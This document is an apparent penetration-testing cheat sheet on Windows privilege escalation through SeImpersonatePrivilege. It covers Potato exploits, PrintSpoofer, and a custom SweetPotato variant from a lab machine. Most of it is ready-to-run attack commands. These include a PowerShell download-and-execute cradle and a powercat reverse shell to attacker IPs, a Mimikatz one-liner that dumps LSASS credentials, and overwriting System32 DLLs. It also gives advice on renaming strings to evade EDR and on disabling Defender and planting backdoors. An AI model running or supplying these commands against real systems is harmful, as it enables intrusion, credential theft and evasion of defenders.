Privilege Impersonation
#Overview
The SeImpersonatePrivilege (and its sibling SeAssignPrimaryTokenPrivilege) allows a process to impersonate a client after authentication. When a privileged service (like SYSTEM) connects to an attacker-controlled named pipe, the attacker can impersonate the SYSTEM token and escalate. This is the foundation of the "Potato" family of exploits and PrintSpoofer.
#Prerequisites
- A user with SeImpersonatePrivilege (check via
whoami /priv) - Service accounts, IIS APPPOOL accounts, and local service accounts often have this privilege
- Target Windows version determines which Potato variant works
#Detection & Enumeration
whoami /priv
rem Look for:
rem SeImpersonatePrivilege Impersonate a client after authentication Enabled
rem SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
CMD
# Check if Print Spooler is running (required for PrintSpoofer)
Get-Service Spooler | Format-Table Name,Status
# Check Windows version (determines Potato variant)
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
POWERSHELL
#Exploitation / Execution
#Potato Exploit Evolution
| Exploit | Windows Version | Technique |
|---|---|---|
| RottenPotato | < Windows 10 1809 | DCOM + BITS + named pipe |
| JuicyPotato | Windows 10 1809 + Server 2019 | DCOM/CLSID + named pipe |
| RoguePotato | Windows 10 1809 + Server 2019 | Rogue OXID Resolver |
| SweetPotato | Windows 10/11 + Server 2019/2022 | Multi-method (combines Juicy, Rogue, Efs) |
| PrintSpoofer | Windows 10/Server 2019 | Printer Bug + named pipe |
| GodPotato | Windows 10/11 + Server 2019/2022 | RPC + named pipe |
| EfsPotato | Windows 10/11 + Server 2019/2022 | EFS RPC + named pipe |
| PipePotato | Windows 10/11 + Server 2019/2022 | Named pipe + RPC |
#JuicyPotato
rem Requires finding a valid CLSID for the target Windows version
rem CLSID list: https://github.com/ohpe/juicy-potato/tree/master/CLSID
rem Create a bat file with the payload
echo powershell -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/rev.ps1')" > C:\Users\Public\shell.bat
rem Execute JuicyPotato
.\JuicyPotato.exe -l 1337 -p C:\Users\Public\shell.bat -t * -c {<CLSID>}
rem -l: COM listening port
rem -p: program to launch
rem -t: createprocess call (use * for both CreateProcessWithTokenW and CreateProcessAsUser)
rem -c: CLSID for the COM server
CMD
#PrintSpoofer
rem Simplest to use -- no CLSID needed, works on Server 2019/2022
.\PrintSpoofer.exe -i -c "C:\Users\Public\shell.bat"
rem -i: interactive (inherit parent console)
rem -c: command to execute
CMD
#GodPotato
rem Latest variant, works on most Windows versions including 11
.\GodPotato.exe -cmd "C:\Users\Public\shell.bat"
CMD
#SweetPotato (Custom Implementation)
Real example from Cereal: A custom SweetPotato variant was built to trigger via SSRF:
// Modified PotatoAPI.cs Trigger method
public bool Trigger()
{
HttpClient client = new HttpClient();
string body = "{\"query\":\"mutation {updatePlant(plantId: 1, version: 1, sourceURL: \\\"http://127.0.0.1:9999\\\") }\",\"variables\":null}";
HttpResponseMessage res = client.PostAsync("http://127.0.0.1:8080/api/graphql", data).Result;
// Wait for impersonation...
}
// WinRMListener on port 9999 with NTLM negotiation
// Impersonates the SYSTEM token received via NTLM auth
CSHARP
Cereal exploitation flow:
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
echo "powercat -c 10.10.14.4 -p 4444 -e cmd" >> powercat.ps1
Set-Content shell.bat -Value "powershell iex(iwr http://10.10.14.4/powercat.ps1 -useb)"
wget 10.10.14.4/modpotato.exe -O modpotato.exe
.\modpotato.exe -p C:\Users\Sonny\shell.bat
# Shell received as SYSTEM
POWERSHELL
#EfsPotato
rem Exploits EFS RPC for impersonation
.\EfsPotato.exe -c "C:\Users\Public\shell.bat"
CMD
#CLSID Selection for JuicyPotato
rem Test CLSIDs if the default doesn't work
rem Get OS version:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
rem Windows 10 Enterprise/Pro:
rem CLSID: {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}, {0fb40f0d-1021-4022-8da0-aab0588dfc8b}
rem Windows Server 2016:
rem CLSID: {8BC3F05E-D86B-11D0-A075-00C04FB68820}, {9b1f122c-2982-4e91-aa8b-e071d54f2a4d}
rem Windows Server 2019:
rem CLSID: {6d18ad12-bde1-4393-b5fc-374e0839d6df}
rem Test a CLSID:
.\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {<CLSID>}
rem If it fails with "CLSID not found", try another
CMD
#Named Pipe Client Impersonation Chain
The underlying technique for all Potato variants:
- Create a named pipe server (the attacker)
- Force a privileged process (SYSTEM) to connect to the named pipe
- The SYSTEM process authenticates via NTLM
- The named pipe server calls ImpersonateNamedPipeClient()
- The server now has a SYSTEM impersonation token
- Duplicate the token and spawn a process with SYSTEM privileges
#Potato Attack Comparison — Which Exploit Works Where?
| Variant | Windows ≤2016 | Windows 2019 | Windows 2022 | Win11 | Requirements | Notes |
|---|---|---|---|---|---|---|
| RottenPotato | ✓ | ✗ | ✗ | ✗ | SeImpersonate | Original, outdated |
| JuicyPotato | ✓ | ✗ | ✗ | ✗ | SeImpersonate + CLSID | Win2019+ blocks CLSID |
| RoguePotato | ✗ | ✓ | ✓ | ✓ | SeImpersonate | Needs remote SMB listener |
| SweetPotato | ✓ | ✓ | ✓ | ✓ | SeImpersonate | Universal, multiple methods |
| PrintSpoofer | ✗ | ✓ | ✓ | ✓ | SeImpersonate | Simplest for 2019+ |
| GodPotato | ✓ | ✓ | ✓ | ✓ | SeImpersonate | Works on most versions |
| EfsPotato | ✓ | ✓ | ✓ | ✓ | SeImpersonate | Abuses EFS RPC |
| PipePotato | ✓ | ✓ | ✓ | ✓ | SeImpersonate | Named pipe impersonation |
Quick decision: On Windows Server 2019+ → try PrintSpoofer or GodPotato. On older systems → JuicyPotato.
#SeDebugPrivilege + SeImpersonatePrivilege Combined Workflow
# Complete Mimikatz privilege escalation chain
mimikatz # privilege::debug # Enable SeDebugPrivilege
Privilege '20' OK
mimikatz # token::elevate # Elevate to SYSTEM using SeImpersonatePrivilege
Token Id : 0
User : SYSTEM
mimikatz # sekurlsa::logonpasswords # Dump credentials from LSASS
# Now you have all credentials from memory
# One-liner alternative:
mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
POWERSHELL
#Additional Privilege Exploits
# SeLoadDriverPrivilege — Load arbitrary kernel driver
# Create a malicious driver and load it for SYSTEM code execution
# Requires: SeLoadDriverPrivilege (e.g., Print Operators group)
# Tool: Capcom.sys driver loading technique
# Reference: https://github.com/TarlogicSecurity/EoPLoadDriver
# SeTakeOwnershipPrivilege — Take ownership of any file
takeown /f C:\Users\Administrator\Desktop\flag.txt /a
icacls C:\Users\Administrator\Desktop\flag.txt /grant Everyone:F
type C:\Users\Administrator\Desktop\flag.txt
# SeRestorePrivilege — Write to any file path
# Same as Backup Operators SeRestorePrivilege but can be held independently
# Allows overwriting critical system files:
copy /Y C:\temp\malicious.dll C:\Windows\System32\legitimate.dll
POWERSHELL
#PrintSpoofer Flags
:: PrintSpoofer -i vs -c flag distinction
PrintSpoofer.exe -i -c cmd :: -i = interactive (for existing terminal sessions)
PrintSpoofer.exe -c "cmd /c C:\temp\reverse_shell.exe" :: -c = command execution (for reverse shells)
:: Use -i when you have an existing console, -c when running from a non-interactive context
CMD
#whoami /priv Interpretation
:: Privilege to exploit mapping:
:: SeImpersonatePrivilege → Potato attacks, PrintSpoofer, GodPotato
:: SeBackupPrivilege → Read any file (SAM/SYSTEM, NTDS.dit)
:: SeRestorePrivilege → Write any file (DLL hijack, service replacement)
:: SeDebugPrivilege → Access LSASS process memory
:: SeTakeOwnershipPrivilege → Take ownership of any file
:: SeLoadDriverPrivilege → Load kernel driver (SYSTEM code execution)
:: SeManageVolumePrivilege → Write to C:\ (privilege escalation via file replace)
:: SeCreateTokenPrivilege → Create custom access tokens
:: SeAssignPrimaryTokenPrivilege → Assign tokens to processes
CMD
#Common Pitfalls
- Windows Server 2019+ and Windows 10 1809+ broke RottenPotato; use JuicyPotato or newer variants
- CLSID must be valid for the specific Windows version and build -- trial and error may be needed
- PrintSpoofer requires Print Spooler service to be running (check
Get-Service Spooler) - Some AV/EDR products block the DCOM/RPC calls used by Potato exploits
- Named pipe creation may be restricted by security policies
- The SYSTEM service may authenticate with anonymous credentials if the named pipe security descriptor is too permissive
#OPSEC Considerations
- Potato exploits create named pipes and trigger DCOM/RPC calls -- these are signatured by most EDR products.
- PrintSpoofer uses the Printer Bug which generates event log entries in the PrintService log.
- The spawned SYSTEM process is visible in process trees and may trigger anomalous process creation alerts.
- Running unknown executables (JuicyPotato.exe, GodPotato.exe) is a strong indicator of compromise.
- Compile custom variants from source with renamed methods and strings to reduce signature-based detection.
#Post-Exploitation Value
Potato exploits provide immediate SYSTEM access with full privileges. From SYSTEM: dump LSASS credentials, extract SAM/SYSTEM, create new admin accounts, disable Defender, install persistent backdoors, pivot to domain resources with machine account credentials.
#Cross-References
#Tool References
| Tool | Link |
|---|---|
| JuicyPotato | https://github.com/ohpe/juicy-potato |
| PrintSpoofer | https://github.com/itm4n/PrintSpoofer |
| GodPotato | https://github.com/BeichenDream/GodPotato |
| SweetPotato | https://github.com/CCob/SweetPotato |
| EfsPotato | https://github.com/zcgonvh/EfsPotato |
#Source Machines
- Cereal (Hard, Windows) - Custom SweetPotato via SSRF + NTLM impersonation on Windows Server 2019